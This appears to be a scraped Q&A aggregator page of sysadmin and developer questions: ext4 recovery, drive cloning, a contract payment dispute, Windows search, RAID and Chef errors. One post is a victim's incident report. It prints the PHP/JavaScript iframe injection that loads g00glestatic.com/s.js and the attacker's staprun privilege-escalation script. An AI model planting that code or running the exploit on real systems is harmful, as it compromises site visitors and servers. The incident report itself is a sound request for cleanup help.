Menu. Right click on the views>Home folder and select Add>View u. Let us name our View as ListCustomers, Select Razor(CSHTML) as View Engine, Put a check mark on Create a strongly-typed view, and select Customer (MyWebSite.Models) as model class. Slect List on the Scaffold Template and Click OK. v. Run the MVC Application by pressing F5, and on the address bar insert Home/ListCustomers, We should now see a web page similar below.   x. 
You can edit ListCustomers.CSHTML to remove and add HTML codes @model IEnumerable<MyWebSite.Models.Customer>   @{     Layout = null; }   <!DOCTYPE html>   <html> <head>     <meta name="viewport" content="width=device-width" />     <title>ListCustomers</title> </head> <body>     <h2>List of Customers</h2>     <table border="1">         <tr>             <th>                 @Html.DisplayNameFor(model => model.CompanyName)             </th>             <th>                 @Html.DisplayNameFor(model => model.Description)             </th>             <th>                 @Html.DisplayNameFor(model => model.ContactPerson)             </th>             <th>                 @Html.DisplayNameFor(model => model.ContactNo)             </th>         </tr>         @foreach (var item in Model) {         <tr>             <td>                 @Html.DisplayFor(modelItem => item.CompanyName)             </td>             <td>                 @Html.DisplayFor(modelItem => item.Description)             </td>             <td>                 @Html.DisplayFor(modelItem => item.ContactPerson)             </td>             <td>                 @Html.DisplayFor(modelItem => item.ContactNo)             </td>                   </tr>     }         </table> </body> </html> y. Press F5 to run the MVC Application   z. You will notice some @HTML.DisplayFor codes. These are called HTML Helpers you can read more about HTML Helpers on this site http://www.w3schools.com/aspnet/mvc_htmlhelpers.asp   That’s all. You now have your first MVC4 Razor Engine Web Application . . .

    Read the article

  • How can I recover an ext4 filesystem corrupted after a fsck?

    - by Regan
    I have an ext4 filesystem on luks over software raid5. The filesystem was operating "just fine" for several years when I was beginning to run out of space. I had a 9T volume on 6x2T drives. I began upgrading to 3T drives by doing the mdadm fail, remove, add, rebuild, repeat process until I had a larger array. I then grew the luks container, and then when I unmounted and tried to resize2fs I was given the message the filesystem was dirty and needed e2fsck. Without thinking I just did e2fsck -y /dev/mapper/candybox and it began spewing all kinds of inode being removed type messages (can't remember exactly) I killed e2fsck and tried to remount the filesystem to backup data I was concerned about. When trying to mount at this point I get: # mount /dev/mapper/candybox /candybox mount: wrong fs type, bad option, bad superblock on /dev/mapper/candybox, missing codepage or helper program, or other error In some cases useful info is found in syslog - try dmesg | tail or so Looking back at my older logs I noticed the filesystem was giving this error each time the machine booted: kernel: [79137.275531] EXT4-fs (dm-2): warning: mounting fs with errors, running e2fsck is recommended So shame on me for not paying attention :( I then tried to mount using every backup superblock (one after another) and each attempt left this in my log: EXT4-fs (dm-2): ext4_check_descriptors: Checksum for group 0 failed (26534!=65440) EXT4-fs (dm-2): ext4_check_descriptors: Checksum for group 1 failed (38021!=36729) EXT4-fs (dm-2): ext4_check_descriptors: Checksum for group 2 failed (18336!=39845) ... EXT4-fs (dm-2): ext4_check_descriptors: Checksum for group 11911 failed (28743!=44098) BUG: soft lockup - CPU#0 stuck for 23s! [mount:2939] Attempts to restart e2fsck results in: # e2fsck /dev/mapper/candybox e2fsck 1.41.14 (22-Dec-2010) e2fsck: Group descriptors look bad... trying backup blocks... candy: recovering journal e2fsck: unable to set superblock flags on candy At this point, I decided it best to order some more drives and make an image using ddrescue Now two weeks later I have an image of the luks partition in a .img file. # ls -lh total 14T -rw-r--r-- 1 root root 14T Oct 25 01:57 candybox.img -rw-r--r-- 1 root root 271 Oct 20 14:32 candybox.logfile After numerous attempts using everything I could find online I could not coerce e2fsck to do anything on the image, so I used mkfs.ext4 -L candy candybox.img -m 0 -S and I was able to mount the dirty filesystem readonly without the journal and recover 960G of data. It gave all kinds of errors of various directories not existing and so forth but I was able to get some stuff. Which gave me some hope! I then ran e2fsck again and it had to recreate the root inode and gave a massive list of correcting group counts, I accepted the root inode creation and said no to everything else, leaving a completely empty filesystem. Re-ran again and said yes to all questions with the same result but now a "clean" but empty filesystem. extundelete gives me 0 recoverable inodes found. And now I'm stuck again, I can't come up with any other methods other than dropping to something like photorec which will give me an absolute mess with how large the filesystem was. I'm willing to re-copy the image from the original array and start over, if I can get any suggestions or ideas on a way to get more of my files back. 
I wish I could give more detailed logs of the commands that have run, but the output is long scrolled passed except for what gets logged to syslog and my memory is not as detailed due to the timeframe this has occurred over. Any help is greatly appreciated!
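    Since the poster is willing to re-copy the image, here is a hedged sketch of the usual "fresh copy, alternate superblock, catastrophic-mode debugfs" pass; the superblock offset and mount points are assumptions.

        # work on another copy of the ddrescue image, never the only one (yes, another 14T)
        cp candybox.img candybox-work.img
        losetup -f --show candybox-work.img       # prints e.g. /dev/loop0
        # try a backup superblock before anything that rewrites metadata (unlike mkfs -S)
        e2fsck -b 32768 -B 4096 /dev/loop0
        # browse the filesystem without trusting bitmaps and copy directory trees out
        debugfs -c /dev/loop0
        #   debugfs:  ls -l /
        #   debugfs:  rdump /some/directory /mnt/recovered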

    Read the article

  • I'm a contract developer and I think I'm about to get screwed [closed]

    - by kagaku
    I do contract development on the side. You could say that I'm a contract developer? Considering I've only ever had one client I'd say that's not exactly the truth - more like I took a side job and needed some extra cash. It started out as a "rebuild our website and we'll pay you $10k" type project. Once that was complete (a bit over schedule, but certainly not over budget), the company hired me on as a "long term support" contractor. The contract is to go from March of this year, expiring on December 31st of this year - 10 months. Over which a payment is to be paid on the 30th of each month for a set amount. I've been fulfilling my end of the contract on all points - doing server maintenence, application and database changes, doing huge rush changes and pretty much just going above and beyond. Currently I'm in the middle of development of an iPhone mobile application (PhoneGap based) which is nearing completion (probably 3-4 weeks from submission). It has not been all peaches and flowers though. Each and every month when my paycheck comes due, there always seems to be an issue of sorts. These issues did not occur during the initial project, only during the support contract. The actual contract states that my check should be mailed out on the 30th of the month. I have received my check on time approximately once (on time being about 2-3 days within the 30th). I've received my paycheck as late as the 15th of the next month - over two weeks late. I've put up with it because I need the paycheck. There have been promises and promises of "we'll send it out on time next time! I promise" - only to receive it just as late the next month. When I ask about payment they give me a vibe like "why are you only worried about money?" - unfortunately I don't have the luxury of not worrying about money. The last straw was with my August payment, which should have been mailed on August 30th. I received it on September 12th. The reason for the delay? "USPS is delaying it man! we sent it out on the 1st!" is the reason I got. When I finally got the check in the mail, the postage on the envelope was marked September 10th - the date it was run through the postage machine. I've been outright lied to, at this point. I carry on working, because again - I need a paycheck. I orchestrated the move of our application to a new server, developed a bunch of new changes and continued work on the iPhone app. All told I probably went over my hourly allotment (I'm paid for 40 hours a month, I probably put in at least 50). On Saturday, the 1st, I gave the main contact at the company (a company of 3, by the way - this is not some big corporation) a ring and filled him in on the status of my work for the past two weeks. Unusually I hadn't heard from him since the middle of September. His response was "oh... well, that is nice and uh.. good job. well, we've been talking within the company about things and we've certainly got some decisions ahead of us..." - not verbatim but you get the idea (I hope?). I got out of this conversation that the site is not doing very well (which it's not) and they're considering pulling the plug. Crap, this contract is going to end early - there goes Christmas! Fine, that's alright, no problem. I'll get paid for the last months work and call it a day. Unfortunately I still haven't gotten last months check, and I'm getting dicked around now. "Oh.. we had problems transferring funds, we'll try and mail it out tomorrow" and "I left a VM with the finance guy, but I can't get ahold of him". 
So I'm getting the feeling I'm not getting paid for all the work I put in for September. This is obviously breach of contract, and I am pissed. Thinking irrationally, I considered changing all their passwords and holding their stuff hostage. Before I think it through (by the way, I am NOT going to do this, realized it would probably get me in trouble), I go and try some passwords for our various accounts. Google Apps? Oh, I'm no longer administrator here. Godaddy? Whoops, invalid password. Disqus? Nope, invalid password here too. Google Adsense / Analytics? Invalid password. Dedicated server account manager? Invalid password. Now, I have the servers root password - I just built the box last week and haven't had a chance to send the guy the root password. Wasn't in a rush, I manage the server and they never touch it. Now all of a sudden all the passwords except this one are changed; the writing is on the wall - I am out. Here's the conundrum. I have the root password, they do not. If I give them this password all the leverage I have is gone, out the door and out of my hands. During this argument of why am I not getting paid the guy sends me an email saying "oh by the way, what's the root username and password to the server?". Considering he knows absolutely nothing, I gave him an "admin" account which really has almost no rights. I still have exclusive access to the server, I just don't know where to go. I can hold their data hostage, but I'm almost positive this is the wrong thing to do. I'd consider it blackmail, regardless of whether or not I have gotten paid yet. I can "break" something on the server and give them the whole "well, if you were paying me I could fix it!" spiel. This works from a "well he's not holding their stuff hostage" point of view, but what stops them from hiring some one else to just fix the issue at hand? For all I know the guys nephew is a "l33t hax0r" and can figure it out for free. I can give in, document as much as I can and take him to small claims court. This is breach of contract, I'm not getting paid. I have a case, right? ???? Does anyone have any experience in this? What can I do? What are my options? I'm broke, I can't afford a lawyer and I can barely afford not getting this paycheck. My wife doesn't work (I work two jobs so she doesn't have to work - we have a 1 year old) and is already looking at getting a part time job to cover the bills. Long term we'll be fine, but this has pissed me off beyond belief! Help me out, I'm about to get screwed.

    Read the article

  • Backup, Migrate or Clone Failing CentOS 4 (LVM)

    - by Hegelworm
    I've been running a BlueQuartz CentOS 4 system (Nuonce.net distro) for a few years now and although the hard drive (Deskstar) has always been a bit noisy, on a few recent occasions I've heard it having trouble spinning up. Basically, I want to clone this drive to a similar sized one (80 Gig). I've spent many hours reading upon dd, dd_rescue, rsync, clonezilla and LVM mirroring yet the sheer number of options and nightmarish accounts has left me frozen - unable to make an informed decision as to how to start. I've made a few attempts. dd failed after about 2 hours, as, although the drives appeared to be identical on the surface (ATA Seagate Barracudas, Thai not Chinese), the destination drive is slightly smaller. My most recent attempt involved using a Debian CD to format the new drive and then rsync-ing everything over and editing the new drive's grub and fstab to reflect the changes. No joy here either as I hadn't chosen LVM when partitioning the destination drive and it wouldn't boot. As you can probably tell, I'm out of my depth here and a panic-invoking mixture of caution and frustration has prompted me to sign up here. The server itself, although not strictly a production environment, has a very specific installation of Festival, LAME and ffMpeg and provides the back-end for a Text-to-Speech jQuery plugin that I've built over the last 2 years. I'm also planning to rebuild the whole TTS system on Debian as the existing CentOS system still has PHP4 etc. For now though, I'd really like to just shift everything over to a new drive. As this is my first post, please feel free to lay any house rules on me that I might've overlooked; I've been hovering around StackOverflow for a while now but have only just signed up. Many thanks. Update: Thanks for your responses so far - it's much appreciated and makes me feel a little more confident when I can double-check things here. I had the idea of doing a fresh install of CentOS (from the original disk) on the new drive so the partitions and LVM were all set up correctly (after disconnecting my source drive to prevent painful mistakes). I then booted into rescue mode from the same CD, and, to avoid a conflicting label, changed the /boot partition's label using e2label to /bootnew. I then changed the VolGroup name using lvm vgrename from VolGroup00 to VolGroup001. I could then boot with both drives in. After mounting the new drive (via its VolGroup001 alias) into /newhd, I rsync-ed over everything I could to the new drive, using -avr switches and backslashes. Like mentioned here. I then disconnected my original source drive again, booted from the liveCD again, changed back the boot partition label from /bootnew to /boot using e2label and then renamed the VolGroup back to VolGroup00. I then rebooted and it went through the familiar start-up routine only to not find a host of files in proc, usr, lib, var etc. The boot did complete but there were lots of red 'FAILS'. I could log in with my existing creds, but the network was kaput, I couldn't startX (desktop GUI) and there were also a few (a lot) of error messages pertaining to iptables. Back to square one. I naively thought I'd nailed it. Shall I just buy a bigger hard drive and attempt the dd route? I've read that this can mess with LVM setups and there's the added risk of working on two unmounted drives at once with a low-level tool. Thanks again.
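    For what it's worth, a hedged sketch of the rsync-style clone attempted above with the steps that commonly get missed; device names, mount point and exclude list are assumptions, and CentOS 4 ships GRUB legacy, so adjust the bootloader step to your setup.

        # new drive's root filesystem mounted on /newhd, source system running normally
        rsync -avH --numeric-ids \
            --exclude=/dev --exclude=/proc --exclude=/sys --exclude=/tmp --exclude=/newhd \
            / /newhd/
        # recreate the pseudo-filesystem mount points rsync skipped
        mkdir -p /newhd/dev /newhd/proc /newhd/sys /newhd/tmp
        # adjust /newhd/etc/fstab and grub.conf for the new drive's labels/VG names, then:
        mount --bind /dev /newhd/dev
        mount -t proc proc /newhd/proc
        chroot /newhd grub-install /dev/sdb     # whichever device node the new disk has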

    Read the article

  • Windows 8 Stuck on Start Screen File Search

    - by baturayd
    I have been searching for someone else having the same issue, but I couldn't find any. Here is my problem: I'm using Windows 8 Pro with Media Center. The file search screen does not close itself after I make a file search within the start screen. It gets stuck on that screen. I can't go back to the desktop, and therefore the task manager is inaccessible. The only way to get out of it is to sign out. It also looks non-operational: it doesn't give me any results at all. It's just a blank screen with a "Files" title. It used to work perfectly.

    Things I have done before coming here:

    Safe mode minimal boot to ensure no other 3rd party software interferes.
    sfc hasn't found any inconsistencies.
    Search index has been rebuilt.
    Normal boot with all 3rd party services and start-up items disabled.
    System restore to a date when I know this feature was functional.

    And by the way, I have installed all updates released so far. I used file search via the start menu heavily back in Windows 7, so this is an absolute game changer for me. I'm curious what causes this. I'll do a "system refresh" if I can't fix this. I'm working on it, and I'll keep this thread updated should I find any fix.

    First update: I just discovered that the file search screen gets stuck only if it's invoked by typing a query directly in the start screen. It doesn't get stuck if it's invoked from the win + x menu. I was able to "escape" from the stuck screen by invoking it again from the win + x menu. After rebuilding the search index again, search suggestions started to appear again, but there is still no file search functionality.

    Second update: The "Results for" expression appears only for a second near the "Files" title when a search is initialized.

    Third update: As a last resort, I finally tried to do a "System Refresh", which also failed by giving an error after waiting almost 20 minutes at 99%. (Seriously?) After a cold boot it began to undo the changes. After the changes were reverted, I booted the machine without doing anything further and, bingo, search began acting normal again. This is a totally weird solution. It apparently fixed certain system files during the failed refresh and kept those changes because they were supposed to be that way in the first place. I'll keep this thread alive should anyone come up with a more logical explanation.

    Fourth update: After a Windows update, the search functionality stopped responding again. This is the first time it has happened after a system update. Now I have a pretty good suspicion about that update, though I have no solid proof of its involvement with this problem.

    Read the article

  • Mass targeted malware installed - g00glestatic.com [closed]

    - by Silver89
    Possible Duplicate: My server's been hacked EMERGENCY. I run a web server which, over the last few days, seems to have become infected with malware that tries to include content from "http://g00glestatic.com/s.js". It appears the attacker gained access to one of the user accounts (not root), made a few changes, added a few files and ran a few bash commands. These changes stuck out clearly to me because it is not a shared server and I am the only person with access, through very secure passwords. The PHP/JavaScript code that was added: in .php files, this code was added: #9c282e# if(!$srvc_counter) { echo "<script type=\"text/javascript\" src=\"http://g00glestatic.com/s.js\"></script>"; $srvc_counter = true;} #/9c282e# In .js files, this code was added: /*9c282e*/ var _f = document.createElement('iframe'),_r = 'setAttribute'; _f[_r]('src', 'http://g00glestatic.com/s.js'); _f.style.position = 'absolute';_f.style.width = '10px'; _f[_r]('frameborder', navigator.userAgent.indexOf('bf3f1f8686832c30d7c764265f8e7ce8') + 1); _f.style.left = '-5540px'; document.write('<div id=\'MIX_ADS\'></div>'); document.getElementById('MIX_ADS').appendChild(_f); /*/9c282e*/ The bash commands, taken from .bash_history (some usernames/passwords have been substituted): su -c id $replacedPassword id; id; sudo id; replacedPassword id; cd /home/replacedUserId1; chmod +x .sess_28e2f1bc755ed3ca48b32fbcb55b91a7; ./.sess_28e2f1bc755ed3ca48b32fbcb55b91a7; rm /home/replacedUserId1/.sess_28e2f1bc755ed3ca48b32fbcb55b91a7; id; cd /home/replacedUserId1; chmod +x .sess_05ee5257fed0ac8e0f12096f4c3c0d20; ./.sess_05ee5257fed0ac8e0f12096f4c3c0d20; rm /home/replacedUserId1/.sess_05ee5257fed0ac8e0f12096f4c3c0d20; id; cd /home/replacedUserId1; chmod +x .sess_bfa542fc2578cce68eb373782c5689b9; ./.sess_bfa542fc2578cce68eb373782c5689b9; rm /home/replacedUserId1/.sess_bfa542fc2578cce68eb373782c5689b9; id; cd /home/replacedUserId1; chmod +x .sess_bfa542fc2578cce68eb373782c5689b9; ./.sess_bfa542fc2578cce68eb373782c5689b9; rm /home/replacedUserId1/.sess_bfa542fc2578cce68eb373782c5689b9; id; cd /home/replacedUserId1; chmod +x .sess_fb19dfb52ed4a3ae810cd4454ac6ef1e; ./.sess_fb19dfb52ed4a3ae810cd4454ac6ef1e; rm /home/replacedUserId1/.sess_fb19dfb52ed4a3ae810cd4454ac6ef1e; id; kill -9 $$;; kill -9 $$;; kill -9 $$; The above seems to move files added to the public_html to the level above? I also have all 4 of the files that were added: .sess_28e2f1bc755ed3ca48b32fbcb55b91a7 .sess_05ee5257fed0ac8e0f12096f4c3c0d20 .sess_bfa542fc2578cce68eb373782c5689b9 .sess_fb19dfb52ed4a3ae810cd4454ac6ef1e Of those four files, three are not viewable in Notepad++ and display only null characters, whereas .sess_fb19dfb52ed4a3ae810cd4454ac6ef1e consists of: #!/bin/sh export PATH=$PATH:/sbin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/bin; export LC_ALL=en_US.UTF-8 LC_COLLATE=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 LANG=en_US.UTF-8 LANGUAGE=en_US.UTF-8 export TERM=linux echo -n "-> checking staprun: "; if which staprun 2>&1 | grep -q "no $1"; then flag=1 elif [ -z "`which $1 2>&1`" ]; then flag=1; fi if [ "$flag" = "1" ]; then echo "no staprun, exiting"; exit; else echo "found"; echo "-> trying to exploit... "; printf "install uprobes /bin/sh" > ololo.conf; MODPROBE_OPTIONS="-C ololo.conf" staprun -u ololo rm -f ololo.conf fi Other noticeable edits: any files matching ([.htaccess]|[index|header|footer].php|[*.js]) will have been modified, and all system file and directory permissions have been changed to x--x--x. My steps to remove this malware: re-uploaded the original php/js files to revert any changes; changed all user passwords; modified hosts.allow to a static IP so that only I have access; removed the above 4 files and checked all modified-file dates within that directory for any other recent modifications; none can be found. Conclusion: I'm hoping that, as they did not have root access, any changes they wished to make higher up failed, and they were only able to display an iframe on the site for a short amount of time? What else do I need to look for to check that the malware infection has not spread? Second conclusion: this malware sinks too deep to 'clean'; if you get infected I recommend nuking the server and rebuilding from backups with increased security. Possibility: it's possible that FileZilla FTP passwords were stolen through a trojan, as they are unfortunately stored unencrypted; however, Trend Micro Titanium has not found one. The setting to disable saving passwords has now been ticked, and I recommend you take this action as well.

    Read the article

  • Can't Remove Logical Drive/Array from HP P400

    - by Myles
    This is my first post here. Thank you in advance for any assistance with this matter. I'm trying to remove a logical drive (logical drive 2) and an array (array "B") from my Smart Array P400. The host is a DL580 G5 running 64-bit Red Hat Enterprise Linux Server release 5.7 (Tikanga). I am unable to remove the array using either hpacucli or cpqacuxe. I believe it is because of "OS Status: LOCKED". The file system that lives on this array has been unmounted. I do not want to reboot the host. Is there some way to "release" this logical drive so I can remove the array? Note that I do not need to preserve the data on logical drive 2. I intend to physically remove the drives from the machine and replace them with larger drives. I'm using the cciss kernel module that ships with Red Hat 5.7. Here is some information pertaining to the host and the P400 configuration: [root@gort ~]# cat /etc/redhat-release Red Hat Enterprise Linux Server release 5.7 (Tikanga) [root@gort ~]# uname -a Linux gort 2.6.18-274.el5 #1 SMP Fri Jul 8 17:36:59 EDT 2011 x86_64 x86_64 x86_64 GNU/Linux [root@gort ~]# rpm -qa | egrep '^(hp|cpq)' cpqacuxe-9.30-15.0 hp-health-9.25-1551.7.rhel5 hpsmh-7.1.2-3 hpdiags-9.3.0-466 hponcfg-3.1.0-0 hp-snmp-agents-9.25-2384.8.rhel5 hpacucli-9.30-15.0 [root@gort ~]# hpacucli HP Array Configuration Utility CLI 9.30.15.0 Detecting Controllers...Done. Type "help" for a list of supported commands. Type "exit" to close the console. => ctrl all show config detail Smart Array P400 in Slot 0 (Embedded) Bus Interface: PCI Slot: 0 Cache Serial Number: PA82C0J9SVW34U RAID 6 (ADG) Status: Enabled Controller Status: OK Hardware Revision: D Firmware Version: 7.22 Rebuild Priority: Medium Expand Priority: Medium Surface Scan Delay: 15 secs Surface Scan Mode: Idle Wait for Cache Room: Disabled Surface Analysis Inconsistency Notification: Disabled Post Prompt Timeout: 0 secs Cache Board Present: True Cache Status: OK Cache Ratio: 25% Read / 75% Write Drive Write Cache: Disabled Total Cache Size: 256 MB Total Cache Memory Available: 208 MB No-Battery Write Cache: Disabled Cache Backup Power Source: Batteries Battery/Capacitor Count: 1 Battery/Capacitor Status: OK SATA NCQ Supported: True Logical Drive: 1 Size: 136.7 GB Fault Tolerance: RAID 1 Heads: 255 Sectors Per Track: 32 Cylinders: 35132 Strip Size: 128 KB Full Stripe Size: 128 KB Status: OK Caching: Enabled Unique Identifier: 600508B100184A395356573334550002 Disk Name: /dev/cciss/c0d0 Mount Points: /boot 101 MB, /tmp 7.8 GB, /usr 3.9 GB, /usr/local 2.0 GB, /var 3.9 GB, / 2.0 GB, /local 113.2 GB OS Status: LOCKED Logical Drive Label: A0027AA78DEE Mirror Group 0: physicaldrive 1I:1:2 (port 1I:box 1:bay 2, SAS, 146 GB, OK) Mirror Group 1: physicaldrive 1I:1:1 (port 1I:box 1:bay 1, SAS, 146 GB, OK) Drive Type: Data Array: A Interface Type: SAS Unused Space: 0 MB Status: OK Array Type: Data physicaldrive 1I:1:1 Port: 1I Box: 1 Bay: 1 Status: OK Drive Type: Data Drive Interface Type: SAS Size: 146 GB Rotational Speed: 10000 Firmware Revision: HPDE Serial Number: 3NM57RF40000983878FX Model: HP DG146BB976 Current Temperature (C): 29 Maximum Temperature (C): 35 PHY Count: 2 PHY Transfer Rate: Unknown, Unknown physicaldrive 1I:1:2 Port: 1I Box: 1 Bay: 2 Status: OK Drive Type: Data Drive Interface Type: SAS Size: 146 GB Rotational Speed: 10000 Firmware Revision: HPDE Serial Number: 3NM55VQC000098388524 Model: HP DG146BB976 Current Temperature (C): 29 Maximum Temperature (C): 36 PHY Count: 2 PHY Transfer Rate: Unknown, Unknown Logical Drive: 2 Size: 546.8 GB 
Fault Tolerance: RAID 5 Heads: 255 Sectors Per Track: 32 Cylinders: 65535 Strip Size: 64 KB Full Stripe Size: 256 KB Status: OK Caching: Enabled Parity Initialization Status: Initialization Completed Unique Identifier: 600508B100184A395356573334550003 Disk Name: /dev/cciss/c0d1 Mount Points: None OS Status: LOCKED Logical Drive Label: A5C9C6F81504 Drive Type: Data Array: B Interface Type: SAS Unused Space: 0 MB Status: OK Array Type: Data physicaldrive 1I:1:3 Port: 1I Box: 1 Bay: 3 Status: OK Drive Type: Data Drive Interface Type: SAS Size: 146 GB Rotational Speed: 10000 Firmware Revision: HPDE Serial Number: 3NM2H5PE00009802NK19 Model: HP DG146ABAB4 Current Temperature (C): 30 Maximum Temperature (C): 37 PHY Count: 1 PHY Transfer Rate: Unknown physicaldrive 1I:1:4 Port: 1I Box: 1 Bay: 4 Status: OK Drive Type: Data Drive Interface Type: SAS Size: 146 GB Rotational Speed: 10000 Firmware Revision: HPDE Serial Number: 3NM28YY400009750MKPJ Model: HP DG146ABAB4 Current Temperature (C): 31 Maximum Temperature (C): 36 PHY Count: 1 PHY Transfer Rate: 3.0Gbps physicaldrive 2I:1:5 Port: 2I Box: 1 Bay: 5 Status: OK Drive Type: Data Drive Interface Type: SAS Size: 146 GB Rotational Speed: 10000 Firmware Revision: HPDE Serial Number: 3NM2FGYV00009802N3GN Model: HP DG146ABAB4 Current Temperature (C): 30 Maximum Temperature (C): 38 PHY Count: 1 PHY Transfer Rate: Unknown physicaldrive 2I:1:6 Port: 2I Box: 1 Bay: 6 Status: OK Drive Type: Data Drive Interface Type: SAS Size: 146 GB Rotational Speed: 10000 Firmware Revision: HPDE Serial Number: 3NM8AFAK00009920MMV1 Model: HP DG146BB976 Current Temperature (C): 31 Maximum Temperature (C): 41 PHY Count: 2 PHY Transfer Rate: Unknown, Unknown physicaldrive 2I:1:7 Port: 2I Box: 1 Bay: 7 Status: OK Drive Type: Data Drive Interface Type: SAS Size: 146 GB Rotational Speed: 10000 Firmware Revision: HPDE Serial Number: 3NM2FJQD00009801MSHQ Model: HP DG146ABAB4 Current Temperature (C): 29 Maximum Temperature (C): 39 PHY Count: 1 PHY Transfer Rate: Unknown
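    For what it's worth, the "OS Status: LOCKED" flag generally means the kernel still holds a reference to /dev/cciss/c0d1 (a device-mapper/LVM mapping or some other user of the block device), and the controller refuses to delete a logical drive the OS has open. A sketch of the usual sequence, assuming slot 0 as shown in the output above; verify the delete syntax against the hpacucli help on your version before running it:

        # Find out what still holds the block device open
        lsof /dev/cciss/c0d1
        dmsetup ls                     # device-mapper / LVM mappings keep LUNs "locked"
        pvs                            # if c0d1 is an LVM PV, deactivate its VG first:
        # vgchange -an <volume_group>

        # With the device released, delete logical drive 2 (removing the only LD
        # in array B should drop the array as well)
        hpacucli ctrl slot=0 ld 2 delete forced
        hpacucli ctrl slot=0 show config

    If the device cannot be released from the running kernel, the fallback is usually to schedule the deletion for a maintenance window, since the controller will not let go of a logical drive the OS still considers in use.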

    Read the article

  • Chef-solo cannot locate an nginx recipe template

    - by crftr
    I have been recently experimenting with Chef. I thought I would attempt to rebuild my personal web server using chef-solo. It's an AWS instance running the Amazon 64bit Linux AMI. My first objective is to install nginx. I have cloned the Opscode cookbook repository, and am using their nginx cookbook. My problem appears to be that chef-solo cannot find a template after it has started the process. The command I'm using is chef-solo -j /etc/chef/dna.json dna.json { "nginx": { "user": "ec2-user" }, "recipes": [ "nginx" ] } solo.rb file_cache_path "/var/chef-solo" cookbook_path "/var/chef-solo/cookbooks" ...the output [root@ip-10-202-221-135 chef-solo]# chef-solo -j /etc/chef/dna.json /usr/lib64/ruby/gems/1.9.1/gems/systemu-2.2.0/lib/systemu.rb:29: Use RbConfig instead of obsolete and deprecated Config. [Fri, 27 Jan 2012 19:41:36 +0000] INFO: *** Chef 0.10.8 *** [Fri, 27 Jan 2012 19:41:37 +0000] INFO: Setting the run_list to ["nginx"] from JSON [Fri, 27 Jan 2012 19:41:37 +0000] INFO: Run List is [recipe[nginx]] [Fri, 27 Jan 2012 19:41:37 +0000] INFO: Run List expands to [nginx] [Fri, 27 Jan 2012 19:41:37 +0000] INFO: Starting Chef Run for ip-10-202-221-135.ec2.internal [Fri, 27 Jan 2012 19:41:37 +0000] INFO: Running start handlers [Fri, 27 Jan 2012 19:41:37 +0000] INFO: Start handlers complete. [Fri, 27 Jan 2012 19:41:37 +0000] INFO: Missing gem 'mysql' [Fri, 27 Jan 2012 19:41:38 +0000] INFO: Processing package[nginx] action install (nginx::default line 21) [Fri, 27 Jan 2012 19:41:39 +0000] INFO: Processing directory[/var/log/nginx] action create (nginx::default line 23) [Fri, 27 Jan 2012 19:41:39 +0000] INFO: Processing template[/usr/sbin/nxensite] action create (nginx::default line 30) [Fri, 27 Jan 2012 19:41:39 +0000] INFO: Processing template[/usr/sbin/nxdissite] action create (nginx::default line 30) [Fri, 27 Jan 2012 19:41:39 +0000] INFO: Processing template[nginx.conf] action create (nginx::default line 38) [Fri, 27 Jan 2012 19:41:39 +0000] INFO: Processing template[/etc/nginx/sites-available/default] action create (nginx::default line 46) [Fri, 27 Jan 2012 19:41:39 +0000] INFO: template[/etc/nginx/sites-available/default] mode changed to 644 [Fri, 27 Jan 2012 19:41:39 +0000] ERROR: template[/etc/nginx/sites-available/default] (nginx::default line 46) has had an error [Fri, 27 Jan 2012 19:41:39 +0000] ERROR: template[/etc/nginx/sites-available/default] (/var/chef-solo/cookbooks/nginx/recipes/default.rb:46:in `from_file') had an error: template[/etc/nginx/sites-available/default] (nginx::default line 46) had an error: Errno::ENOENT: No such file or directory - (/tmp/chef-rendered-template20120127-29441-1yp55vz, /etc/nginx/sites-available/default) /usr/lib64/ruby/1.9.1/fileutils.rb:519:in `rename' /usr/lib64/ruby/1.9.1/fileutils.rb:519:in `block in mv' /usr/lib64/ruby/1.9.1/fileutils.rb:1515:in `block in fu_each_src_dest' /usr/lib64/ruby/1.9.1/fileutils.rb:1531:in `fu_each_src_dest0' /usr/lib64/ruby/1.9.1/fileutils.rb:1513:in `fu_each_src_dest' /usr/lib64/ruby/1.9.1/fileutils.rb:508:in `mv' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/provider/template.rb:47:in `block in action_create' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/mixin/template.rb:48:in `block in render_template' /usr/lib64/ruby/1.9.1/tempfile.rb:316:in `open' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/mixin/template.rb:45:in `render_template' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/provider/template.rb:99:in `render_with_context' 
/usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/provider/template.rb:39:in `action_create' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/resource.rb:440:in `run_action' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/runner.rb:45:in `run_action' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/runner.rb:81:in `block (2 levels) in converge' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/runner.rb:81:in `each' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/runner.rb:81:in `block in converge' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/resource_collection.rb:94:in `block in execute_each_resource' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/resource_collection/stepable_iterator.rb:116:in `call' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/resource_collection/stepable_iterator.rb:116:in `call_iterator_block' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/resource_collection/stepable_iterator.rb:85:in `step' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/resource_collection/stepable_iterator.rb:104:in `iterate' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/resource_collection/stepable_iterator.rb:55:in `each_with_index' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/resource_collection.rb:92:in `execute_each_resource' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/runner.rb:76:in `converge' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/client.rb:312:in `converge' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/client.rb:160:in `run' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/application/solo.rb:192:in `block in run_application' 